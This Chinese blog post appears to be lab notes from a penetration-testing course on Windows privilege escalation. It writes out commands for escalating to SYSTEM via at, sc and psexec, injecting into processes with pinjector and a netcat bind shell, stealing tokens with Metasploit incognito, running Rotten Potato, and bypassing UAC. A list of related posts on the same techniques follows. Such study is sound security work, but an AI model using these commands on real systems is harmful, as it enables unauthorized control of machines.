第101天:权限提升-Win 本地用户&进程注入&令牌窃取&AT&SC&PS 服务命令

于 2024-06-05 14:17:21 发布
阅读量713 收藏 19
点赞数 17
文章标签: 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71529930/article/details/139430706
版权

目录

思维导图

案例一: WIN-本地用户-AT&SC&PS 命令

AT命令

sc

PS

案例二:WIN-本地用户-进程迁移注入获取

msf

案例三:WIN-本地&Web-令牌窃取&土豆溢出

令牌窃取

土豆溢出

案例四: uac原理与绕过

思维导图

案例一: WIN-本地用户-AT&SC&PS 命令

AT命令

适用版本:Win2000 & Win2003 & XP 中还是存在的,在 Win7 以后被剔除

2003

at 21:00 /interactive cmd

18分的时候弹出窗口

sc

只适用于旧版本2003之前的

#创建一个名叫 syscmd 的新的交互式的 cmd 执行服务
sc Create syscmd binPath= "cmd /K start" type= own type= interact
#运行服务
sc start syscmd

PS

适用版本: Test in Win2012 and Win2008 & Win2016 其他未测 基本可以

执行命令

psexec.exe -accepteula -s -i -d cmd #调用运行 cmd

执行效果

win7

win2012

win2019

案例二:WIN-本地用户-进程迁移注入获取

win2003以下的版本可以利用工具pinjector

pinjector -p 420 cmd 3333  #在PID= 进程下添加一个继承父进程权限的线程
nc 192.168.46.149 3333

msf

利用工具注入的话,只能适用于2003版本,所以这里利用msf可以通杀

首先2008先反弹shell,admin

查看进程为system的

在该进程下添加

migrate pid号

测试的时候发现如果利用该进程好像会把系统打蓝屏,谨慎使用

win2019的测试结果

案例三:WIN-本地&Web-令牌窃取&土豆溢出

令牌窃取

执行的前提是身份一定是大于iis用户,否则无法执行

命令

use incognito    
list_tokens -u
impersonate_token "NT AUTHORITY\SYSTEM"

win2019测试

个人主机win11,能否成功主要是看是否设置了uac

土豆溢出

项目下载地址:https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-075

原理是正常上传webshell只能获得web权限,无法提权到system,配合烂土豆,执行,溢出可以获得system权限

这里我执行失败了,未知原因

execute -cH -f ./potato.exe   #执行烂土豆程序

use incognito   #加载窃取模块

list_tokens -u   #查看可窃取的令牌

impersonate_token "NT AUTHORITY\SYSTEM"   #窃取令牌

案例四: uac原理与绕过

利用msf  getsystem命令会自动帮你提权到system(在可以提权的条件下)

如何开启或关闭uac?

 

当时最低权限的时候

可以提权成功

 二级(每次切换得重启系统)

提权失败

搜索绕过uac的模块

使用该模块

2级与3级使用方法相似

4级

设置以后启动大部分程序都会弹出窗口需要确认

四级更加无法启动了

利用模块

exploit/windows/local/ask

会弹出窗口进行请求,如果对方点击就能提权,不点就不行

xiaojiesec
关注
红队内网攻防渗透:内网渗透之windows内网权限提升技术:服务启动&远程控制&进程启动&令牌窃取
HACKONE的博客
06-02 119
这里如果把shell注入到system的进程中就是system权限,但是中途如果要迁移shell到别的进程,需要看用户名权限,如果system迁移到administrator就是降权,如果administrator迁移到system就是提权。获取的权限是administrator,然后用一下所讲的技术进行提权和降权,如果是users的权限,以下技术是用不到的。这里是降权,选择权限是amdinistrator的权限进行注入,就会产生新的admin的权限shell回来。服务启动后上线的是system权限
权限提升-Windows本地提权-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC
xiaoheizi的博客
08-30 1500
进程迁移注入提权就是将获取到权限低的进程注入进程权限高的中,这样就实现了权限提升,同时注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现。操作数据库的权限,数据库的增删改等,源码或配置文件泄漏,也可能是网站权限(webshell)进行的数据库配置文件读取获得。原理:把我的进程注入到一个现有的system账号运行的进程中,这样我的进程也就具有了system账号的权限了。程序路径:Potato/source/Potato/Potato/bin/Release/Potato.exe。
101权限提升-Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令
qq_46081990的博客
06-22 307
【代码】第101权限提升-Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令
进程注入进程提权
WgpSec狼组安全团队
06-04 1184
本文作者:Gality 本文字数:7928字 阅读时长:20分钟 本文属于【狼组安全社区】原创奖励计划,未经许可禁止转载 由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,狼组安全团队以及文章作者不为此承担任何责任。 狼组安全团队有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经狼组安全团队允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 最近在研究进程注入相关的东西,主要是参考process-
Windows提权—进程注入、Unattended Installs提权
negnegil的博客
09-12 992
进程注入提权 使用 pinjector.exe 注入到system用户的进程中,使该进程绑定在0.0.0.0:port ,并建立监听端口,攻击者从攻击机上主动连接该地址,获取到系统的system权限 注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现 下载pinjector.exe https://www.tarasco.org/security/Process_Injector/index.html 上传 pinjector.exe到靶机可执行目录 ##列取所有进程 pinje
Windows权限提升令牌窃取、UAC提权、进程注入等提权
剁椒鱼头没剁椒的博客
03-27 4456
在之前的文章中已经对Windows的权限提升进行了介绍,这里同样不再赘述,如果想要去了解Windows权限提升可以看以下的文章,同时也将Windows权限提升其它的几种办法也放在下面的文章中。同时本来应该还写一篇第三方全家提权的,但是在实际测试过程中发现,有些第三方提权,如果在电脑上都会自动更新,比如向日葵,低版本的直接无法连接向日葵官方的服务器,那么提个毛权限的啊。Windows权限提升—溢出提权Windows权限提升—MySQL数据库提权。
第61权限提升-Redis&Postgre&令牌窃取&进程注入1
08-03
本文以“第61权限提升-Redis&Postgre&令牌窃取&进程注入1”为主题,探讨了四种不同的提权策略,分别是通过数据库应用提权、Redis数据库权限提升、PostgreSQL数据库权限提升以及Windows系统的令牌窃取进程注入...
第62权限提升-烂土豆&dll劫持&引号路径&服务权限1
08-03
如果服务的配置允许普通用户更改其路径或执行权限,攻击者可以上传恶意文件并修改服务配置,使得服务执行攻击者的代码,从而获得本地权限。利用accesschk.exe工具可以检查服务权限,并通过sc命令进行配置更改。 ...
权限提升Win本地用户&进程注入&令牌窃取&AT&SC&PS服务命令
今天是几号的博客
02-20 922
适用版本:windows 7、8、03、08、12、16。当我们拿到低权限的用户(webshell用户不能创建计划命令),通过连接上服务器后,可以通过at命令来进行本地提权。适用版本:Test in Win2012 and Win2008 & Win2016 其他未测 基本可以。适用版本:Win2000 & Win2003 & XP中还是存在的,在Win7以后被剔除.at命令是一个计划命令,可以在规定时间完成一些操作,这个命令调用system权限。#创建一个名叫syscmd的新的交互式的cmd执行服务
windows 7下进入System帐号并运行桌面系统
热门推荐
小老虎的博客
02-22 1万+
众所周知,在Windows 7上可以允许用户最高权限的运行帐号是Administrator,但有些系统操作这个权限仍不够,系统无限制权限的帐户是内置的System,可以对系统为所欲为,比如删除注册表中不允许删除的字段,查看、修改、删除系统保护的文件等。下面说一下Win7或XP下进入这个帐号的方法(Win10下测试已经不能进入了):    1.以管理员权限运行cmd,输入并运行 “sc Creat
windows本地提权--AT&SC&PS命令&进程迁移注入
最新发布
金灰的博客
04-22 702
免责声明:本文仅做技术交流与学习,请知法守法,不要乱搞破坏等等......本地--->system。
【渗透测试笔记】之【提权】
AA8j的博客
06-03 539
操作系统默认用户 Windows User Administrator System Linux User Root Windows USER->System WinXP、03 at 10:11 /intertractive cmd Win7、8 sc Create syscmd binPath="cmd /K start" type=own type=interact sc start syscmd 利用开发工具 首先下载微软开发工具包:https://download.sysin
window2003 中cmd提权到system
xiaolan458的专栏
04-09 414
window提权 system
权限提升-Win系统权限提升篇&计算机管理用户&进程注入&令牌窃取&服务启动&远程控制
siu~
03-25 893
1、计算机管理用户到System-入口点和应用点 2、计算机管理用户到System-服务启动&远程控制 3、计算机管理用户到System-进程注入&令牌窃取 章节点: 1、Web权限提升及转移 2、系统权限提升及转移 3、宿主权限提升及转移 4、域控权限提升及转移
windows提权总结
m0_52329625的博客
01-08 1256
自己总结学习的一些Windows提权思路,借鉴了许多网上公开的教程思路总结的一篇文章
Windows提权实战————4、DLL注入
Fly_鹏程万里
05-23 3376
前言DLL注入是一种允许攻击者在另一个进程的地址空间的上下文中运行任意代码的技术。如果某进程以过多的权限运行,那么可以会被攻击者加以利用,以DLL文件的形式执行恶意代码以提升权限。手动注入通过Metasploit的msfvenom创建DLL,该文件可以生成包含特定有效内容的DLL文件。应该注意的是,如果DLL被注入进程是64位,那么应该使用64位有效负载。下一步是设置metasploit监听,以...
【提权】注入进程提权
weixin_34008784的博客
12-31 608
注入进程提权【相当于开了一个后门,隐蔽性极高,不会创建新的进程,很难发现】 注入到system用户的进程,当管理员账户或其他账户注销后,后门仍然存在。可以理解为将pinjector注入到其他用户的进程里一起运行,进而同时拥有了对应的权限。 下面是图文教程。 0x01 从http://www.tarasco.org/security/Process_Injector/ 下载pinjecto...
Windows提权】进程注入提权
ssrf
03-04 1517
介绍 获取当前操作系统进程中所拥有的权限 注入进程提权【相当于开了一个后门,隐蔽性极高,不会创建新的进程,很难发现】 注入到system用户的进程,当管理员账户或其他账户注销后,后门仍然存在。可以理解为将pinjector注入到其他用户的进程里一起运行,进而同时拥有了对应的权限。 攻击过程 使用工具列出当前操作系统的所有进程 pinjector.exe -l 可以看到不同的进程对应不同PID和用户。 执行pinjector.exe -p 600 cmd 2345注入进程pid为600的进程,使用端口23
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值